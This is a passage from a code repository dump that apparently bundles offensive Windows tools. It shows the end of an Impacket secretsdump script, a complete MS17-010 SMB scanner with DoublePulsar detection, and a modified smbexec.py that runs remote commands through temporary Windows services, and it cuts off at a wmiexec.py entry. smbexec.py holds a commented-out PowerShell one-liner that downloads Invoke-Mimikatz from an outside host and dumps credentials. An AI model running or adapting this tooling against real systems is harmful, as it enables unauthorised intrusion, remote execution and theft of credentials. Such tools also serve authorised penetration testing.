mode')\n        sys.exit(1)\n\n    if address.upper() == 'LOCAL' and username == '' and options.resumefile is not None:\n        logging.error('resuming a previous NTDS.DIT dump session is not supported in LOCAL mode')\n        sys.exit(1)\n\n    if address.upper() == 'LOCAL' and username == '':\n        if options.system is None:\n            logging.error('SYSTEM hive is always required for local parsing, check help')\n            sys.exit(1)\n    else:\n\n        if domain is None:\n            domain = ''\n\n        if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n            from getpass import getpass\n\n            password = getpass(\"Password:\")\n\n        if options.aesKey is not None:\n            options.k = True\n    #dumper = DumpSecrets(address, username, password, domain, options)\n    dumper = DumpSecrets(address, username, password, passwordHash, domain)\n    try:\n        dumper.dump()\n    except Exception, e:\n        logging.error(e)\n"
  },
  {
    "path": "deps/smb_exploit.py",
    "content": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n$ python2.7 smb_exploit.py 192.168.206.152\n[+] [192.168.206.152] is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7600)\n\n$ python2.7 smb_exploit.py 192.168.206.130\n[+] [192.168.206.130] is likely VULNERABLE to MS17-010! (Windows 5.1)\n\"\"\"\n\nfrom ctypes import *\nimport socket\nimport struct\nimport logging\n\n\nlogging.basicConfig(level=logging.INFO, format=\"%(message)s\")\nlog = logging.getLogger(__file__)\n\n# negotiate_proto_request\n# session_setup_andx_request\n# tree_connect_andx_request\n# peeknamedpipe_request\n# trans2 request\n\n\nclass SMB_HEADER(Structure):\n  \"\"\"SMB Header decoder.\n  \"\"\"\n\n  _pack_ = 1  # Alignment\n\n  _fields_ = [\n    (\"server_component\", c_uint32),\n    (\"smb_command\", c_uint8),\n    (\"error_class\", c_uint8),\n    (\"reserved1\", c_uint8),\n    (\"error_code\", c_uint16),\n    (\"flags\", c_uint8),\n    (\"flags2\", c_uint16),\n    (\"process_id_high\", c_uint16),\n    (\"signature\", c_uint64),\n    (\"reserved2\", c_uint16),\n    (\"tree_id\", c_uint16),\n    (\"process_id\", c_uint16),\n    (\"user_id\", c_uint16),\n    (\"multiplex_id\", c_uint16)\n  ]\n\n  def __new__(self, buffer=None):\n    return self.from_buffer_copy(buffer)\n\n  def __init__(self, buffer):\n    log.debug(\"server_component : %04x\" % self.server_component)\n    log.debug(\"smb_command      : %01x\" % self.smb_command)\n    log.debug(\"error_class      : %01x\" % self.error_class)\n    log.debug(\"error_code       : %02x\" % self.error_code)\n    log.debug(\"flags            : %01x\" % self.flags)\n    log.debug(\"flags2           : %02x\" % self.flags2)\n    log.debug(\"process_id_high  : %02x\" % self.process_id_high)\n    log.debug(\"signature        : %08x\" % self.signature)\n    log.debug(\"reserved2        : %02x\" % self.reserved2)\n    log.debug(\"tree_id          : %02x\" % self.tree_id)\n    log.debug(\"process_id       : %02x\" % self.process_id)\n    log.debug(\"user_id          : %02x\" % self.user_id)\n    log.debug(\"multiplex_id     : %02x\" % self.multiplex_id)\n\n\ndef generate_smb_proto_payload(*protos):\n    \"\"\"Generate SMB Protocol. Pakcet protos in order.\n    \"\"\"\n    hexdata = []\n    for proto in protos:\n      hexdata.extend(proto)\n    return \"\".join(hexdata)\n\n\ndef calculate_doublepulsar_xor_key(s):\n    \"\"\"Calaculate Doublepulsar Xor Key\n    \"\"\"\n    x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n    x = x & 0xffffffff  # this line was added just to truncate to 32 bits\n    return x\n\n\ndef negotiate_proto_request():\n    \"\"\"Generate a negotiate_proto_request packet.\n    \"\"\"\n    log.debug(\"generate negotiate request\")\n    netbios = [\n      '\\x00',              # 'Message_Type'\n      '\\x00\\x00\\x54'       # 'Length'\n    ]\n\n    smb_header = [\n      '\\xFF\\x53\\x4D\\x42',  # 'server_component': .SMB\n      '\\x72',              # 'smb_command': Negotiate Protocol\n      '\\x00\\x00\\x00\\x00',  # 'nt_status'\n      '\\x18',              # 'flags'\n      '\\x01\\x28',          # 'flags2'\n      '\\x00\\x00',          # 'process_id_high'\n      '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00',  # 'signature'\n      '\\x00\\x00',          # 'reserved'\n      '\\x00\\x00',          # 'tree_id'\n      '\\x2F\\x4B',          # 'process_id'\n      '\\x00\\x00',          # 'user_id'\n      '\\xC5\\x5E'           # 'multiplex_id'\n    ]\n\n    negotiate_proto_request = [\n      '\\x00',              # 'word_count'\n      '\\x31\\x00',          # 'byte_count'\n\n      # Requested Dialects\n      '\\x02',              # 'dialet_buffer_format'\n      '\\x4C\\x41\\x4E\\x4D\\x41\\x4E\\x31\\x2E\\x30\\x00',   # 'dialet_name': LANMAN1.0\n\n      '\\x02',              # 'dialet_buffer_format'\n      '\\x4C\\x4D\\x31\\x2E\\x32\\x58\\x30\\x30\\x32\\x00',   # 'dialet_name': LM1.2X002\n\n      '\\x02',              # 'dialet_buffer_format'\n      '\\x4E\\x54\\x20\\x4C\\x41\\x4E\\x4D\\x41\\x4E\\x20\\x31\\x2E\\x30\\x00',  # 'dialet_name3': NT LANMAN 1.0\n\n      '\\x02',              # 'dialet_buffer_format'\n      '\\x4E\\x54\\x20\\x4C\\x4D\\x20\\x30\\x2E\\x31\\x32\\x00'   # 'dialet_name4': NT LM 0.12\n    ]\n\n    return generate_smb_proto_payload(netbios, smb_header, negotiate_proto_request)\n\n\ndef session_setup_andx_request():\n    \"\"\"Generate session setuo andx request.\n    \"\"\"\n    log.debug(\"generate session setup andx request\")\n    netbios = [\n      '\\x00',              # 'Message_Type'\n      '\\x00\\x00\\x63'       # 'Length'\n    ]\n\n    smb_header = [\n      '\\xFF\\x53\\x4D\\x42',  # 'server_component': .SMB\n      '\\x73',              # 'smb_command': Session Setup AndX\n      '\\x00\\x00\\x00\\x00',  # 'nt_status'\n      '\\x18',              # 'flags'\n      '\\x01\\x20',          # 'flags2'\n      '\\x00\\x00',          # 'process_id_high'\n      '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00',  # 'signature'\n      '\\x00\\x00',          # 'reserved'\n      '\\x00\\x00',          # 'tree_id'\n      '\\x2F\\x4B',          # 'process_id'\n      '\\x00\\x00',          # 'user_id'\n      '\\xC5\\x5E'           # 'multiplex_id'\n    ]\n\n    session_setup_andx_request = [\n      '\\x0D',              # Word Count\n      '\\xFF',              # AndXCommand: No further command\n      '\\x00',              # Reserved\n      '\\x00\\x00',          # AndXOffset\n      '\\xDF\\xFF',          # Max Buffer\n      '\\x02\\x00',          # Max Mpx Count\n      '\\x01\\x00',          # VC Number\n      '\\x00\\x00\\x00\\x00',  # Session Key\n      '\\x00\\x00',          # ANSI Password Length\n      '\\x00\\x00',          # Unicode Password Length\n      '\\x00\\x00\\x00\\x00',  # Reserved\n      '\\x40\\x00\\x00\\x00',  # Capabilities\n      '\\x26\\x00',          # Byte Count\n      '\\x00',              # Account\n      '\\x2e\\x00',          # Primary Domain\n      '\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x32\\x30\\x30\\x30\\x20\\x32\\x31\\x39\\x35\\x00',    # Native OS: Windows 2000 2195\n      '\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x32\\x30\\x30\\x30\\x20\\x35\\x2e\\x30\\x00',        # Native OS: Windows 2000 5.0\n    ]\n\n    return generate_smb_proto_payload(netbios, smb_header, session_setup_andx_request)\n\n\ndef tree_connect_andx_request(ip, userid):\n    \"\"\"Generate tree connect andx request.\n    \"\"\"\n    log.debug(\"generate tree connect andx request\")\n\n    netbios = [\n      '\\x00',              # 'Message_Type'\n      '\\x00\\x00\\x47'       # 'Length'\n    ]\n\n    smb_header = [\n      '\\xFF\\x53\\x4D\\x42',  # 'server_component': .SMB\n      '\\x75',              # 'smb_command': Tree Connect AndX\n      '\\x00\\x00\\x00\\x00',  # 'nt_status'\n      '\\x18',              # 'flags'\n      '\\x01\\x20',          # 'flags2'\n      '\\x00\\x00',          # 'process_id_high'\n      '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00',  # 'signature'\n      '\\x00\\x00',          # 'reserved'\n      '\\x00\\x00',          # 'tree_id'\n      '\\x2F\\x4B',          # 'process_id'\n      userid,              # 'user_id'\n      '\\xC5\\x5E'           # 'multiplex_id'\n    ]\n\n    ipc = \"\\\\\\\\{}\\IPC$\\x00\".format(ip)\n    log.debug(\"Connecting to {} with UID = {}\".format(ipc, userid))\n\n    tree_connect_andx_request = [\n      '\\x04',              # Word Count\n      '\\xFF',              # AndXCommand: No further commands\n      '\\x00',              # Reserved\n      '\\x00\\x00',          # AndXOffset\n      '\\x00\\x00',          # Flags\n      '\\x01\\x00',          # Password Length\n      '\\x1C\\x00',          # Byte Count\n      '\\x00',              # Password\n      ipc.encode(),        # \\\\xxx.xxx.xxx.xxx\\IPC$\n      '\\x3f\\x3f\\x3f\\x3f\\x3f\\x00'   # Service\n    ]\n\n    length = len(\"\".join(smb_header)) + len(\"\".join(tree_connect_andx_request))\n    # netbios[1] = '\\x00' + struct.pack('>H', length)\n    netbios[1] = struct.pack(\">L\", length)[-3:]\n\n    return generate_smb_proto_payload(netbios, smb_header, tree_connect_andx_request)\n\n\ndef peeknamedpipe_request(treeid, processid, userid, multiplex_id):\n    \"\"\"Generate tran2 request\n    \"\"\"\n    log.debug(\"generate peeknamedpipe request\")\n    netbios = [\n      '\\x00',              # 'Message_Type'\n      '\\x00\\x00\\x4a'       # 'Length'\n    ]\n\n    smb_header = [\n      '\\xFF\\x53\\x4D\\x42',  # 'server_component': .SMB\n      '\\x25',              # 'smb_command': Trans2\n      '\\x00\\x00\\x00\\x00',  # 'nt_status'\n      '\\x18',              # 'flags'\n      '\\x01\\x28',          # 'flags2'\n      '\\x00\\x00',          # 'process_id_high'\n      '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00',  # 'signature'\n      '\\x00\\x00',          # 'reserved'\n      treeid,\n      processid,\n      userid,\n      multiplex_id\n    ]\n\n    tran_request = [\n      '\\x10',              # Word Count\n      '\\x00\\x00',          # Total Parameter Count\n      '\\x00\\x00',          # Total Data Count\n      '\\xff\\xff',          # Max Parameter Count\n      '\\xff\\xff',          # Max Data Count\n      '\\x00',              # Max Setup Count\n      '\\x00',              # Reserved\n      '\\x00\\x00',          # Flags\n      '\\x00\\x00\\x00\\x00',  # Timeout: Return immediately\n      '\\x00\\x00',          # Reversed\n      '\\x00\\x00',          # Parameter Count\n      '\\x4a\\x00',          # Parameter Offset\n      '\\x00\\x00',          # Data Count\n      '\\x4a\\x00',          # Data Offset\n      '\\x02',              # Setup Count\n      '\\x00',              # Reversed\n      '\\x23\\x00',          # SMB Pipe Protocol: Function: PeekNamedPipe (0x0023)\n      '\\x00\\x00',          # SMB Pipe Protocol: FID\n      '\\x07\\x00',\n      '\\x5c\\x50\\x49\\x50\\x45\\x5c\\x00'  # \\PIPE\\\n    ]\n\n    return generate_smb_proto_payload(netbios, smb_header, tran_request)\n\n\ndef trans2_request(treeid, processid, userid, multiplex_id):\n    \"\"\"Generate trans2 request.\n    \"\"\"\n    log.debug(\"generate tran2 request\")\n    netbios = [\n      '\\x00',              # 'Message_Type'\n      '\\x00\\x00\\x4f'       # 'Length'\n    ]\n\n    smb_header = [\n      '\\xFF\\x53\\x4D\\x42',  # 'server_component': .SMB\n      '\\x32',              # 'smb_command': Trans2\n      '\\x00\\x00\\x00\\x00',  # 'nt_status'\n      '\\x18',              # 'flags'\n      '\\x07\\xc0',          # 'flags2'\n      '\\x00\\x00',          # 'process_id_high'\n      '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00',  # 'signature'\n      '\\x00\\x00',          # 'reserved'\n      treeid,\n      processid,\n      userid,\n      multiplex_id\n    ]\n\n    trans2_request = [\n      '\\x0f',              # Word Count\n      '\\x0c\\x00',          # Total Parameter Count\n      '\\x00\\x00',          # Total Data Count\n      '\\x01\\x00',          # Max Parameter Count\n      '\\x00\\x00',          # Max Data Count\n      '\\x00',              # Max Setup Count\n      '\\x00',              # Reserved\n      '\\x00\\x00',          # Flags\n      '\\xa6\\xd9\\xa4\\x00',  # Timeout: 3 hours, 3.622 seconds\n      '\\x00\\x00',          # Reversed\n      '\\x0c\\x00',          # Parameter Count\n      '\\x42\\x00',          # Parameter Offset\n      '\\x00\\x00',          # Data Count\n      '\\x4e\\x00',          # Data Offset\n      '\\x01',              # Setup Count\n      '\\x00',              # Reserved\n      '\\x0e\\x00',          # subcommand: SESSION_SETUP\n      '\\x00\\x00',          # Byte Count\n      '\\x0c\\x00' + '\\x00' * 12\n    ]\n\n    return generate_smb_proto_payload(netbios, smb_header, trans2_request)\n\ndef check(ip, port=445):\n    \"\"\"Check if MS17_010 SMB Vulnerability exists.\n    \"\"\"\n    try:\n        buffersize = 1024\n        timeout = 5.0\n\n        # Send smb request based on socket.\n        client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        client.settimeout(timeout)\n        client.connect((ip, port))\n\n        # SMB - Negotiate Protocol Request\n        raw_proto = negotiate_proto_request()\n        client.send(raw_proto)\n        tcp_response = client.recv(buffersize)\n\n        # SMB - Session Setup AndX Request\n        raw_proto = session_setup_andx_request()\n        client.send(raw_proto)\n        tcp_response = client.recv(buffersize)\n\n        netbios = tcp_response[:4]\n        smb_header = tcp_response[4:36]   # SMB Header: 32 bytes\n        smb = SMB_HEADER(smb_header)\n\n        user_id = struct.pack('<H', smb.user_id)\n\n        # parse native_os from Session Setup Andx Response\n        session_setup_andx_response = tcp_response[36:]\n        native_os = session_setup_andx_response[9:].split('\\x00')[0]\n\n        # SMB - Tree Connect AndX Request\n        raw_proto = tree_connect_andx_request(ip, user_id)\n        client.send(raw_proto)\n        tcp_response = client.recv(buffersize)\n\n        netbios = tcp_response[:4]\n        smb_header = tcp_response[4:36]   # SMB Header: 32 bytes\n        smb = SMB_HEADER(smb_header)\n\n        tree_id = struct.pack('<H', smb.tree_id)\n        process_id = struct.pack('<H', smb.process_id)\n        user_id = struct.pack('<H', smb.user_id)\n        multiplex_id = struct.pack('<H', smb.multiplex_id)\n\n        # SMB - PeekNamedPipe Request\n        raw_proto = peeknamedpipe_request(tree_id, process_id, user_id, multiplex_id)\n        client.send(raw_proto)\n        tcp_response = client.recv(buffersize)\n\n        netbios = tcp_response[:4]\n        smb_header = tcp_response[4:36]\n        smb = SMB_HEADER(smb_header)\n\n        # nt_status = smb_header[5:9]\n        nt_status = struct.pack('BBH', smb.error_class, smb.reserved1, smb.error_code)\n\n        # 0xC0000205 - STATUS_INSUFF_SERVER_RESOURCES - vulnerable\n        # 0xC0000008 - STATUS_INVALID_HANDLE\n        # 0xC0000022 - STATUS_ACCESS_DENIED\n\n        if nt_status == '\\x05\\x02\\x00\\xc0':\n            print(\"[+] [{}] is likely VULNERABLE to MS17-010! ({})\".format(ip, native_os))\n\n            # vulnerable to MS17-010, check for DoublePulsar infection\n            raw_proto = trans2_request(tree_id, process_id, user_id, multiplex_id)\n            client.send(raw_proto)\n            tcp_response = client.recv(buffersize)\n\n            netbios = tcp_response[:4]\n            smb_header = tcp_response[4:36]\n            smb = SMB_HEADER(smb_header)\n\n            if smb.multiplex_id == 0x0051:\n              key = calculate_doublepulsar_xor_key(smb.signature)\n              print(\"Host is likely INFECTED with DoublePulsar! - XOR Key: {}\".format(key))\n\n        elif nt_status in ('\\x08\\x00\\x00\\xc0', '\\x22\\x00\\x00\\xc0'):\n            log.info(\"[-] [{}] does NOT appear vulnerable\".format(ip))\n        else:\n            log.info(\"[-] [{}] Unable to detect if this host is vulnerable\".format(ip))\n\n    except Exception as err:\n        log.error(\"[-] [{}] Exception: {}\".format(ip, err))\n    finally:\n        client.close()\n\n\nif __name__ == '__main__':\n    import sys\n\n    if len(sys.argv) != 2:\n        print(\"{} <ip>\".format(sys.argv[0]))\n        sys.exit(1)\n    else:\n        check(sys.argv[1])\n\n\n## References\n\n# https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n# https://www.rapid7.com/db/modules/auxiliary/scanner/smb/smb_ms17_010\n# https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb\n# https://www.symantec.com/security_response/vulnerability.jsp?bid=96707\n# https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SMB2/[MS-SMB2]-151016.pdf\n# https://msdn.microsoft.com/en-us/library/windows/desktop/aa365233(v=vs.85).aspx\n# https://technet.microsoft.com/en-us/library/security/ms17-010.aspx\n# https://community.rapid7.com/community/metasploit/blog/2017/04/03/introducing-rubysmb-the-protocol-library-nobody-else-wanted-to-write\n# https://msdn.microsoft.com/en-us/library/ee441741.aspx\n# https://github.com/countercept/doublepulsar-detection-script/blob/master/detect_doublepulsar_smb.py\n# http://stackoverflow.com/questions/38735421/packing-an-integer-number-to-3-bytes-in-python\n# https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html\n"
  },
  {
    "path": "deps/smbexec.py",
    "content": "#!/usr/bin/env python\n# Copyright (c) 2003-2016 CORE Security Technologies\n#\n# This software is provided under under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# A similar approach to psexec w/o using RemComSvc. The technique is described here\n# http://www.accuvant.com/blog/owning-computers-without-shell-access\n# Our implementation goes one step further, instantiating a local smbserver to receive the \n# output of the commands. This is useful in the situation where the target machine does NOT\n# have a writeable share available.\n# Keep in mind that, although this technique might help avoiding AVs, there are a lot of \n# event logs generated and you can't expect executing tasks that will last long since Windows \n# will kill the process since it's not responding as a Windows service. \n# Certainly not a stealthy way.\n#\n# This script works in two ways:\n# 1) share mode: you specify a share, and everything is done through that share.\n# 2) server mode: if for any reason there's no share available, this script will launch a local\n#    SMB server, so the output of the commands executed are sent back by the target machine\n#    into a locally shared folder. Keep in mind you would need root access to bind to port 445 \n#    in the local machine.\n# \n# Author:\n#  beto (@agsolino)\n#\n# Reference for:\n#  DCE/RPC and SMB.\n\nimport sys\nimport os\nimport cmd\nimport argparse\nimport ConfigParser\nimport logging\nfrom threading import Thread\n\nfrom impacket.examples import logger\nfrom impacket import version, smbserver\nfrom impacket.smbconnection import *\nfrom impacket.dcerpc.v5 import transport, scmr\n\ntotalOutput = ''\n\nOUTPUT_FILENAME = '__output'\nBATCH_FILENAME  = 'execute.bat'\nSMBSERVER_DIR   = '__tmp'\nDUMMY_SHARE     = 'TMP'\n\nclass SMBServer(Thread):\n    def __init__(self):\n        Thread.__init__(self)\n        self.smb = None\n\n    def cleanup_server(self):\n        logging.info('Cleaning up..')\n        try:\n            os.unlink(SMBSERVER_DIR + '/smb.log')\n        except:\n            pass\n        os.rmdir(SMBSERVER_DIR)\n\n    def run(self):\n        # Here we write a mini config for the server\n        smbConfig = ConfigParser.ConfigParser()\n        smbConfig.add_section('global')\n        smbConfig.set('global','server_name','server_name')\n        smbConfig.set('global','server_os','UNIX')\n        smbConfig.set('global','server_domain','WORKGROUP')\n        smbConfig.set('global','log_file',SMBSERVER_DIR + '/smb.log')\n        smbConfig.set('global','credentials_file','')\n\n        # Let's add a dummy share\n        smbConfig.add_section(DUMMY_SHARE)\n        smbConfig.set(DUMMY_SHARE,'comment','')\n        smbConfig.set(DUMMY_SHARE,'read only','no')\n        smbConfig.set(DUMMY_SHARE,'share type','0')\n        smbConfig.set(DUMMY_SHARE,'path',SMBSERVER_DIR)\n\n        # IPC always needed\n        smbConfig.add_section('IPC$')\n        smbConfig.set('IPC$','comment','')\n        smbConfig.set('IPC$','read only','yes')\n        smbConfig.set('IPC$','share type','3')\n        smbConfig.set('IPC$','path')\n\n        self.smb = smbserver.SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)\n        logging.info('Creating tmp directory')\n        try:\n            os.mkdir(SMBSERVER_DIR)\n        except Exception, e:\n            logging.critical(str(e))\n            pass\n        logging.info('Setting up SMB Server')\n        self.smb.processConfigFile()\n        logging.info('Ready to listen...')\n        try:\n            self.smb.serve_forever()\n        except:\n            pass\n\n    def stop(self):\n        self.cleanup_server()\n        self.smb.socket.close()\n        self.smb.server_close()\n        self._Thread__stop()\n\nclass CMDEXEC:\n    def __init__(self, username='', password='', domain='', hashes=None, aesKey=None,\n                 doKerberos=None, kdcHost=None, mode=None, share=None, port=445, command=''):\n\n        self.__command = command\n        self.__username = username\n        self.__password = password\n        self.__port = port\n        self.__serviceName = 'BTOBTO'\n        self.__domain = domain\n        self.__lmhash = ''\n        self.__nthash = ''\n        self.__aesKey = aesKey\n        self.__doKerberos = doKerberos\n        self.__kdcHost = kdcHost\n        self.__share = share\n        self.__mode  = mode\n        self.shell = None\n        if hashes is not None:\n            self.__lmhash, self.__nthash = hashes.split(':')\n\n    def run(self, remoteName, remoteHost):\n        stringbinding = 'ncacn_np:%s[\\pipe\\svcctl]' % remoteName\n        logging.debug('StringBinding %s'%stringbinding)\n        rpctransport = transport.DCERPCTransportFactory(stringbinding)\n        rpctransport.set_dport(self.__port)\n        rpctransport.setRemoteHost(remoteHost)\n        if hasattr(rpctransport,'preferred_dialect'):\n            rpctransport.preferred_dialect(SMB_DIALECT)\n        if hasattr(rpctransport, 'set_credentials'):\n            # This method exists only for selected protocol sequences.\n            rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,\n                                         self.__nthash, self.__aesKey)\n        rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)\n\n        self.shell = None\n        try:\n            if self.__mode == 'SERVER':\n                serverThread = SMBServer()\n                serverThread.daemon = True\n                serverThread.start()\n            self.shell = RemoteShell(self.__share, rpctransport, self.__mode, self.__serviceName,self.__command)\n\n            #self.shell.cmdloop()\n            if self.__mode == 'SERVER':\n                serverThread.stop()\n        except  (Exception, KeyboardInterrupt), e:\n            #import traceback\n            #traceback.print_exc()\n            #logging.critical(str(e))\n            try:\n                if self.shell is not None:\n                    self.shell.finish()\n            except:\n                pass\n            sys.stdout.flush()\n            #sys.exit(1)\n\n    def getOutput(self):\n        global totalOutput\n        totalOutput1=''\n        totalOutput1=totalOutput\n        totalOutput=''\n        return totalOutput1\n\n    def stop(self):\n        try:\n            self.shell.finish()\n        except:\n            pass\nclass RemoteShell(cmd.Cmd):\n    def __init__(self, share, rpc, mode, serviceName, command):\n        cmd.Cmd.__init__(self)\n        self.__share = share\n        self.__mode = mode\n        self.__output = '\\\\\\\\127.0.0.1\\\\' + self.__share + '\\\\' + OUTPUT_FILENAME\n        self.__batchFile = '%TEMP%\\\\' + BATCH_FILENAME \n        self.__outputBuffer = ''\n        self.__command = ''\n        self.__shell = '%COMSPEC% /Q /c '\n        self.__serviceName = serviceName\n        self.__rpc = rpc\n        #self.intro = '[!] Launching semi-interactive shell - Careful what you execute'\n        self.__command = command\n\n        self.__scmr = rpc.get_dce_rpc()\n        try:\n            self.__scmr.connect()\n        except Exception, e:\n            logging.critical(str(e))\n            sys.exit(1)\n\n        s = rpc.get_smb_connection()\n\n        # We don't wanna deal with timeouts from now on.\n        s.setTimeout(100000)\n        if mode == 'SERVER':\n            myIPaddr = s.getSMBServer().get_socket().getsockname()[0]\n            self.__copyBack = 'copy %s \\\\\\\\%s\\\\%s' % (self.__output, myIPaddr, DUMMY_SHARE)\n\n        self.__scmr.bind(scmr.MSRPC_UUID_SCMR)\n        resp = scmr.hROpenSCManagerW(self.__scmr)\n        self.__scHandle = resp['lpScHandle']\n        self.transferClient = rpc.get_smb_connection()\n        self.send_data(command)\n        #self.do_cd('')\n\n    def finish(self):\n        # Just in case the service is still created\n        try:\n           self.__scmr = self.__rpc.get_dce_rpc()\n           self.__scmr.connect() \n           self.__scmr.bind(scmr.MSRPC_UUID_SCMR)\n           resp = scmr.hROpenSCManagerW(self.__scmr)\n           self.__scHandle = resp['lpScHandle']\n           resp = scmr.hROpenServiceW(self.__scmr, self.__scHandle, self.__serviceName)\n           service = resp['lpServiceHandle']\n           scmr.hRDeleteService(self.__scmr, service)\n           scmr.hRControlService(self.__scmr, service, scmr.SERVICE_CONTROL_STOP)\n           scmr.hRCloseServiceHandle(self.__scmr, service)\n        except:\n           pass\n\n    def do_shell(self, s):\n        os.system(s)\n\n    def do_exit(self, s):\n        return True\n\n    def emptyline(self):\n        return False\n\n    def do_cd(self, s):\n        # We just can't CD or mantain track of the target dir.\n        if len(s) > 0:\n            logging.error(\"You can't CD under SMBEXEC. Use full paths.\")\n\n        self.execute_remote('cd ' )\n        if len(self.__outputBuffer) > 0:\n            # Stripping CR/LF\n            self.prompt = string.replace(self.__outputBuffer,'\\r\\n','') + '>'\n            self.__outputBuffer = ''\n\n    def do_CD(self, s):\n        return self.do_cd(s)\n\n    def default(self, line):\n        if line != '':\n            self.send_data(line)\n\n    def get_output(self):\n        def output_callback(data):\n            global totalOutput\n            totalOutput += data\n            #self.__outputBuffer += data\n\n        if self.__mode == 'SHARE':\n            self.transferClient.getFile(self.__share, OUTPUT_FILENAME, output_callback)\n            self.transferClient.deleteFile(self.__share, OUTPUT_FILENAME)\n        else:\n            fd = open(SMBSERVER_DIR + '/' + OUTPUT_FILENAME,'r')\n            output_callback(fd.read())\n            fd.close()\n            os.unlink(SMBSERVER_DIR + '/' + OUTPUT_FILENAME)\n\n    def execute_remote(self, data):\n        command = self.__shell + 'echo ' + data + ' ^> ' + self.__output + ' 2^>^&1 > ' + self.__batchFile + ' & ' + \\\n                  self.__shell + self.__batchFile\n        if self.__mode == 'SERVER':\n            command += ' & ' + self.__copyBack\n        command += ' & ' + 'del ' + self.__batchFile \n\n        logging.debug('Executing %s' % command)\n        resp = scmr.hRCreateServiceW(self.__scmr, self.__scHandle, self.__serviceName, self.__serviceName, lpBinaryPathName=command)\n        service = resp['lpServiceHandle']\n\n        try:\n           scmr.hRStartServiceW(self.__scmr, service)\n        except:\n           pass\n        scmr.hRDeleteService(self.__scmr, service)\n        scmr.hRCloseServiceHandle(self.__scmr, service)\n        self.get_output()\n        self.finish()\n\n    def send_data(self, data):\n        self.execute_remote(data)\n        print self.__outputBuffer\n        self.__outputBuffer = ''\n\n\n# Process command-line arguments.\nif __name__ == '__main__':\n    # Init the example's logger theme\n    logger.init()\n    print version.BANNER\n\n    parser = argparse.ArgumentParser()\n\n    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')\n    parser.add_argument('-share', action='store', default = 'C$', help='share where the output will be grabbed from '\n                                                                       '(default C$)')\n    parser.add_argument('-mode', action='store', choices = {'SERVER','SHARE'}, default='SHARE',\n                        help='mode to use (default SHARE, SERVER needs root!)')\n    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n\n    group = parser.add_argument_group('connection')\n\n    group.add_argument('-dc-ip', action='store',metavar = \"ip address\", help='IP Address of the domain controller. '\n                       'If ommited it use the domain part (FQDN) specified in the target parameter')\n    group.add_argument('-target-ip', action='store', metavar=\"ip address\", help='IP Address of the target machine. If '\n                       'ommited it will use whatever was specified as target. This is useful when target is the NetBIOS '\n                       'name and you cannot resolve it')\n    group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar=\"destination port\",\n                       help='Destination port to connect to SMB Server')\n\n    group = parser.add_argument_group('authentication')\n\n    group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n    group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n    group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n                       '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '\n                       'ones specified in the command line')\n    group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n                                                                            '(128 or 256 bits)')\n\n \n    if len(sys.argv)==1:\n        parser.print_help()\n        sys.exit(1)\n\n    options = parser.parse_args()\n\n    if options.debug is True:\n        logging.getLogger().setLevel(logging.DEBUG)\n    else:\n        logging.getLogger().setLevel(logging.INFO)\n\n    import re\n    domain, username, password, remoteName = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(options.target).groups('')\n\n    #In case the password contains '@'\n    if '@' in remoteName:\n        password = password + '@' + remoteName.rpartition('@')[0]\n        remoteName = remoteName.rpartition('@')[2]\n\n    if domain is None:\n        domain = ''\n\n    if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n        from getpass import getpass\n        password = getpass(\"Password:\")\n\n    if options.target_ip is None:\n        options.target_ip = remoteName\n\n    if options.aesKey is not None:\n        options.k = True\n\n    try:\n        command=\"ipconfig.exe /all\"\n        #command=\"C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe  -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass  \\\"IEX (New-Object Net.WebClient).DownloadString('http://172.16.126.190:8000/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\\\"\"\n        executer = CMDEXEC(username, password, domain, options.hashes, options.aesKey, options.k,\n                           options.dc_ip, options.mode, options.share, int(options.port), command)\n        executer.run(remoteName, options.target_ip)\n    except Exception, e:\n        logging.critical(str(e))\n    sys.exit(0)\n"
  },
  {
    "path": "deps/wmiexec.py",
